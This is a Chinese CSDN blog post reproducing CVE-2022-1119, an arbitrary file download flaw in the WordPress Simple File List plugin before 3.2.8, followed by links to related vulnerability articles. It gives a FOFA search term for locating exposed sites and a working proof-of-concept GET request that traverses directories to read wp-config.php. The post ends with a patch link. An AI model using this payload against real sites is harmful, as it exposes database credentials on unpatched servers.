WordPress Simple File List路径遍历漏洞(CVE-2022-1119)

已于 2022-05-17 16:23:08 修改
阅读量1.3k 收藏 1
点赞数 1
文章标签: php 安全 开发语言
于 2022-05-17 16:14:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124823999
版权

一、漏洞描述

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

WordPress plugin The Simple File List 3.2.7及其之前版本存在安全漏洞,该漏洞源于~/includes/ee-downloader.php 文件中的 eeFile 参数缺少控制和过滤。攻击者利用该漏洞可以进行任意文件下载。

二、影响版本

WordPress Simple File List < 3.2.8

三、漏洞环境

fofa:Simple File List

四、漏洞复现

poc:

GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php

五、更新建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606

whatever`
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】WordPress Welcart 任意文件读取漏洞(CVE-2022-4140)
qq_67810151的博客
04-10 416
Welcart存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,获取服务器敏感信息。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
whatday的专栏
08-25 2600
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞。代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码。据漏洞披露者文中所介绍,这个漏洞WordPress核心中被发现已经超过6年。 https://github.com/WordPress/WordPress/commit/7bd776bdb3f496898bba46959066c2c4aa8723d1#diff-c3d5c535db5622f3b0242411ee5f9.
WordPress博客出现的绝对路径泄露漏洞及修复方法
09-28
主要介绍了WordPress出现的绝对路径泄露漏洞及修复方法,需要的朋友可以参考下
WordPress 最新版存在XSS和路径遍历漏洞,请快修补!
nani1114的博客
09-10 3307
WordPress敦促网站站长们更新他们的CMS包,越快越好,以保护其域名免遭关键漏洞攻击。 上周四,最新版WordPress (4.6.1)的内容管理系统(CMS)提供商发布了安全公告,更新的系统存在两个严重漏洞——一个跨站脚本漏洞和一个路径遍历漏洞,并发布了可用的补丁。 1.XSS漏洞 Sumofpwn研究员Cengiz Han早在七月的夏季赏金项目中发现了该漏洞,它允许攻击者使用
WordPress 后台插件更新模块任意目录遍历导致DOS漏洞和IP验证不当漏洞
ITkeke的博客
08-22 1506
最近倡萌频繁收到阿里云的两个漏洞提示,相信很多使用阿里云服务器的朋友也会收到:  WordPress 后台插件更新模块任意目录遍历导致DOS漏洞  WordPress IP验证不当漏洞  修复这两个漏洞的最直接的办法就是马上升级到 WordPress 4.6.1 版本即可!  下面还是简单说说这两个
wp content.php,WordPress WP Content Source Control插件'download.php'目录遍历漏洞
weixin_42519489的博客
04-13 112
发布日期:2014-08-19更新日期:2014-08-21受影响系统:WordPress WP Content Source Control 3.0.0描述:--------------------------------------------------------------------------------BUGTRAQ ID: 69278WP Content Source Cont...
wordlist目录遍历
山兔的博客
10-24 1212
在大多数环境中,Web 服务器在许多部门的基础结构和日常流程中发挥着重要作用。Web服务器有时可以严格地由员工在内部使用,但大多数时候可以发现是面向公众的,这意味着来自Internet的任何人都可以访问它们,以从其托管的网页中检索信息和文件。在大多数情况下,Web服务器上托管的网页通过其管理面板进行管理,并锁定在登录页面后面。让我们想一个例子:我们已经决定开始自己的博客并使用WordPress来实现此目的。但它本质上是一个流行的Web应用程序,可让我们轻松管理要发布的内容以供世界其他地区阅读。
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
fofa指纹识别库(更新于2019)
11-19
fofa指纹识别库,更新于2019。 年长年少,开心就好;
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
Wordpress开发 - 遍历获取菜单列表(itemsList)并且获取菜单子项名(item_name)
hanzi552200的博客
08-08 1113
写在前面 今天开发首页菜单的时候,需要在指定的页面和指定的菜单添加a标签的class名, 但是走了好多弯路,然后最终实现的时候,也不知道该怎么写这个文章?因为感觉只有我自己有这种需求。 比如我要在一个页面名叫“咕咕咕”而且菜单item名叫咕噜球我才给他active 否则不给。 想想还是写一个遍历获取菜单列表(itemsList)吧,英文文档看多了,中文写起来竟然不知道如何组织语言了。 教程开始 在functions.php页面添加以下代码。记得适当的修改,仅提供思路~ functions...
WordPress 热门插件中存在漏洞,200多万网站受影响
最新发布
smellycat000的专栏
05-08 779
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士WordPress 热门插件 Advanced Custom Fields 中存在一个漏洞,用户需升级至版本 6.1.6。该漏洞的编号是CVE-2023-30777。该漏洞是反射型XSS,可滥用于将任意可执行文件脚本注入非恶意网站。该插件同时拥有免费和专业版本,安装量超过200万次。2023年5月,插件维护人员收到漏洞通知。研究员 Rafie M...
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5306
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress4.6命令执行漏洞CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3385
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
WordPress建站教程:WordPress 漏洞报告-2023年1月25日
sixeit的博客
01-29 307
WordPress的系统使用越来越广发,很多的大型企业开始选择利用WordPress作为主技术支撑,但是也有很多人对WordPress系统安全不了解,下面我们由北京六翼信息技术有限公司的技术开发工程师为大家讲解WordPress建站安全问题处理中的漏洞报告。
Wordpress 4.6 任意命令执行漏洞
m0_63241485的博客
08-17 1104
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,需要你有一定的专业知识。WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值